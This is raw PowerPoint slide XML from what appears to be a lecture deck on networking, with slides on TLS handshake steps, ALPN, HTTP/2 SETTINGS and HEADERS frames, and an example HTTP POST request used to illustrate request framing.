            <a:chOff x="3812375" y="3387776"/>
            <a:chExt cx="5250715" cy="381708"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="22" name="Straight Arrow Connector 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAFBCD69-A4F5-8EB6-F603-6A85D83E7948}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3812375" y="3745695"/>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91F348C-A779-3579-AABA-448CC644E765}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5678852" y="3387776"/>
              <a:ext cx="1406154" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>SETTINGS …</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Group 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4C20A00-F8A5-DF30-A115-D1A30292DC29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3429231" y="6213074"/>
            <a:ext cx="5250715" cy="381708"/>
            <a:chOff x="3812375" y="3387776"/>
            <a:chExt cx="5250715" cy="381708"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="26" name="Straight Arrow Connector 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70FFEB03-246F-0166-8F8D-51969D2C0B65}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3812375" y="3745695"/>
              <a:ext cx="5250715" cy="2378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1F924A3-94B2-DC01-C42E-E6F9CA40BBB2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5685266" y="3387776"/>
              <a:ext cx="1393330" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>HEADERS …</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7210BC24-6766-5BE2-A37D-37F52F99442D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134445" y="2766743"/>
            <a:ext cx="2555457" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Establish TLS connection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D3D15EF-336E-2185-0653-C8FA78FC206C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8987769" y="3016689"/>
            <a:ext cx="2683973" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Respond and signal app-level protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3C2C5CA-9B48-16D6-E75C-AC74A112AAF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="122175" y="4572408"/>
            <a:ext cx="2555457" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Initialize HTTP 2 connection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B9D61BF-148F-CA3A-43DE-C18A55A5FAE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8987769" y="5410057"/>
            <a:ext cx="2555457" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Complete HTTP 2 connection setup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26ADBFC6-9A06-DA0A-001A-0D1F541EAACF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="122174" y="6070063"/>
            <a:ext cx="2555457" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR" startAt="5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Request object via HTTP 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="35" name="Group 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0594E2F-2C8A-FA43-3618-24AF99AA9B83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3421307" y="3382666"/>
            <a:ext cx="5250715" cy="381708"/>
            <a:chOff x="3812374" y="3387776"/>
            <a:chExt cx="5250715" cy="381708"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="36" name="Straight Arrow Connector 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6529094A-9673-0A20-CFB1-4A3BE50B5ED8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3812374" y="3745695"/>
              <a:ext cx="5250715" cy="23789"/>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34FD33C-49F2-2708-65EE-EF490F3D8E71}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5395134" y="3387776"/>
              <a:ext cx="1973618" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
                <a:t>ChangeCipherSpec</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="38" name="Group 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A83CAE3-6E25-3DCC-253B-3426344F87BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3421307" y="3885345"/>
            <a:ext cx="5242791" cy="395631"/>
            <a:chOff x="3780935" y="3645362"/>
            <a:chExt cx="5242791" cy="395631"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="39" name="Straight Arrow Connector 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DE53308-F33B-4D2C-1A80-EA1F88930EEF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3780935" y="4040993"/>
              <a:ext cx="5242791"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3C8E8FD-FB43-1D2D-37E9-555D493979BC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5371604" y="3645362"/>
              <a:ext cx="1973617" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
                <a:t>ChangeCipherSpec</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Speech Bubble: Rectangle 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF15300C-5AF2-C8EA-EC9D-8519361D6FEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7909544" y="491165"/>
            <a:ext cx="2746089" cy="1077735"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -80477"/>
              <a:gd name="adj2" fmla="val 16070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TLS feature known as Application Layer Protocol Negotiation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="225958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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="41"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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right)">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up)">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>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par>
                          <p:cTn id="47" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="48" presetID="22" presetClass="entr" presetSubtype="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1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="52" presetID="22" presetClass="entr" presetSubtype="1"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up)">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="31"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="55" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="56" presetID="22" presetClass="entr" presetSubtype="2"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right)">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="59" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="60" presetID="22" presetClass="entr" presetSubtype="1"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up)">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="63" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="64" presetID="22" presetClass="entr" presetSubtype="8"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8" grpId="0"/>
      <p:bldP spid="29" grpId="0"/>
      <p:bldP spid="30" grpId="0"/>
      <p:bldP spid="31" grpId="0"/>
      <p:bldP spid="32" grpId="0"/>
      <p:bldP spid="4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BD758B61-EF43-4466-B9AD-44C28DEA9E46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5532425" y="2021496"/>
            <a:ext cx="0" cy="4640239"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:prstDash val="sysDot"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent3"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BACD054E-657B-4998-AA03-CB9AAF7E231C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP 2 Request Framing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21E2F459-88E3-88E3-F941-760BE3F84769}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203200" y="2747144"/>
            <a:ext cx="3806583" cy="2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POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new_account.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> HTTP/1.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE88B09A-AD2E-A819-4C29-2E57666AE775}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203201" y="3156454"/>
            <a:ext cx="4760686" cy="2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Accept: text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>html,application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xhtml+xml</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B611A1C-78AB-BF95-8F52-8FE7F2622DCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203201" y="3495077"/>
            <a:ext cx="5829464" cy="2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User-Agent: Mozilla/5.0 Chrome/65.0.3323.51</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66567261-B7E1-847B-AFD7-FBF2D24BA5EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203201" y="3857729"/>
            <a:ext cx="5829464" cy="2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Accept-Encoding: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gzip,deflate,sdch</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA1CC72E-2EE4-1CD3-9A98-048980475507}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203201" y="4207867"/>
            <a:ext cx="5829464" cy="2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Accept-Language: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>en-US,en;q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=0.8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41ADC015-BF7F-0A02-B22D-8B059C5C799B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203201" y="4584329"/>
            <a:ext cx="5829464" cy="2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Host: facebook.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87156660-AB88-DB2D-B4A6-5DE7F996269B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203201" y="5984366"/>
            <a:ext cx="5829464" cy="2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username=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cbw&amp;email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cbw@ccs.neu.edu&amp;job</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=professor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDFFBD27-31E2-26F5-4738-06F5322F3873}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203201" y="4953697"/>
            <a:ext cx="5829464" cy="2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Content-Length: 48</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
